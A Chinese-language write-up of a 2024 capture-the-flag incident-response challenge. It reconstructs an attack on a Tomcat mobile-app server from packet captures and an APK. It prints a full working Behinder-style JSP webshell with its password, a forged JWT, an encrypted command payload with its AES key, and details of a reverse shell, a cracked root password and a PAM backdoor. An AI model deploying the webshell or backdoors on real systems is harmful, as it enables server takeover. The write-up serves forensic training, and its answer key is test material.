2024长城杯决赛应急响应

您的同事李白在运维一台部署了移动应用服务端的linux服务器时发现了异常,好像被黑客攻击了。小李通过简单分析,发现可能是由于公司的移动应用和其服务端程序都存在安全问题导致的。小李将当天可能与攻击相关的流量导出,并与移动应用一起打包压缩,你可以下载分析。

1

黑客攻击此服务器所使用的2个IP分别是什么(ascii码从小到大排列,空格分隔)

统计一下IPv4地址,有202.1.1.1,202.1.1.66,202.1.1.129,202.1.1.130,202.1.1.254
202.1.1.66是被攻击的,202.1.1.130,202.1.1.254也能明显排除

1
202.1.1.1 202.1.1.129

2

存在安全问题的apk中使用的登录密码是什么?

jadx分析给的apk,MainActivity中找到密码是password663399

1
password663399

3

黑客尝试上传一个文件但显示无上传权限的文件名是什么?

在流量包中搜索/api/upload,第一个流量报文如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
POST /api/upload HTTP/1.1
Access-Flag: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJyb290IjoiMCIsImV4cCI6MTcxNTQyMjY1OH0._NZIgZpwplDj9vxAyQgTpFVGP5Zragy0ysn5-N3CHRQ
Content-Type: multipart/form-data; boundary=73c2dff9-ef77-468c-a827-fbc47ae4273b
Content-Length: 216
Host: 202.1.1.66:8080
Connection: close
Accept-Encoding: gzip, deflate, br
User-Agent: okhttp/4.9.0

--73c2dff9-ef77-468c-a827-fbc47ae4273b
Content-Disposition: form-data; name="avatar"; filename="pic.jpg"
Content-Type: image/jpeg
Content-Length: 17

#!/bin/bash
df -h
--73c2dff9-ef77-468c-a827-fbc47ae4273b--
HTTP/1.1 200 
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-Frame-Options: DENY
Content-Type: application/json
Transfer-Encoding: chunked
Date: Sat, 11 May 2024 10:12:45 GMT
Connection: close

24
{"msg":"...............","code":100}
0
1
pic.jpg

正则表达式搜索无上传权限应该也行

4

黑客利用的漏洞接口的api地址是什么?(http://xxxx/xx)

jadx分析给的apk,HttpManager中找到http://202.1.1.66:8080/api/upload

1
http://202.1.1.66:8080/api/upload

5

黑客上传的webshell绝对路径是什么?

在流量包中搜索/api/upload,找到以下可疑流量

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
POST /api/upload HTTP/1.1
Access-Flag: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpYXQiOjE3MTUzNDA5NzEsIm5iZiI6MTcxNTM0MDY1MywiZXhwIjoxNzQ3Mzk1Mjk5LCJyb290IjoiMSJ9.JwIu15l_SfvL4DppXaWUBzDTi7-CMuWSMBasr_I3hYs
Content-Type: multipart/form-data; boundary=628c1882-2027-4c85-a009-e4cd41af99a9
Content-Length: 815
Host: 202.1.1.66:8080
Connection: close
Accept-Encoding: gzip, deflate, br
User-Agent: okhttp/4.9.0

--628c1882-2027-4c85-a009-e4cd41af99a9
Content-Disposition: form-data; name="avatar"; filename="pic.jsp"
Content-Type: image/jpeg
Content-Length: 17

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("bing_pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
--628c1882-2027-4c85-a009-e4cd41af99a9--
HTTP/1.1 200 
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-Frame-Options: DENY
Content-Type: application/json
Transfer-Encoding: chunked
Date: Sat, 11 May 2024 10:13:18 GMT
Connection: close

92
{"msg":"..................http://202.1.1.66:8080/static/s74e7vwmzs21d5x6.jsp","code":0,"url":"http://202.1.1.66:8080/static/s74e7vwmzs21d5x6.jsp"}
0

绝对路径上靶机排查一下就行

1
/usr/local/tomcat/webapps/ROOT/static/s74e7vwmzs21d5x6.jsp

6

黑客上传的webshell的密码是什么?

继上题,密码是bing_pass

1
bing_pass

7

黑客通过webshell执行的第一条命令是什么?

冰蝎流量可以用puzzlersolver分析

在流量包中搜索/static/s74e7vwmzs21d5x6.jsp,第一个执行命令的post数据如下

1
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

AES的密钥在之前get请求中找到是b99f657b04941030

根据之前上传的webshell内容,解码出来
第一个执行的命令是pwd

1
pwd

8

黑客获取webshell时查询当前shell的权限是什么?

靶机上cat /etc/passwd,发现tomcat用户

1
tomcat

其他思路

对于流量包中的返回值,可以先show data in原始数据
alt text

然后拿去解AES

alt text

alt text

9

利用webshell查询服务器Linux系统发行版本是什么?

直接在靶机上 uname -a

1
CentOS Linux release 7.4.1708 (Core)

10

黑客从服务器上下载的秘密文件的绝对路径是什么?

连上靶机,在webshell同目录下有

1
/usr/local/tomcat/webapps/ROOT/static/secert.file

11

黑客通过反连执行的第一条命令是什么?

在流量包中筛选4444端口,然后追踪流
tcp.port==4444

1
cat /etc/passwd

12

黑客通过什么文件修改的root密码(绝对路径)

同上题

1
/etc/passwd

13

黑客设置的root密码是多少?

爆破上/etc/passwd中root的hash

john –wordlist=/usr/share/wordlists/rockyou.txt hash.txt

1
123456

14

黑客留下后门的反连的ip和port是什么?(ip:port)

查看定时任务即可

1
202.1.1.129:9999

15

黑客通过后门反连执行的第一条命令是什么?

在流量包中筛选9999端口,然后追踪流
tcp.port==9999

1
rpm -qa | grep pam

16

黑客通过什么文件留下了后门?

根据上一题的命令去搜索pam相关文件
找到/usr/lib/security/pam_unix.so和/usr/lib64/security/pam_unix.so
存在后门

1
pam_unix.so

17

黑客设置的后门密码是什么?

alt text

1
ssh_back_pwd

18

黑客的后门将root密码记录在哪个文件中?(绝对路径)

逆向分析pam_unix.so,发现后门将root密码记录在/tmp/.sshlog中

1
/tmp/.sshlog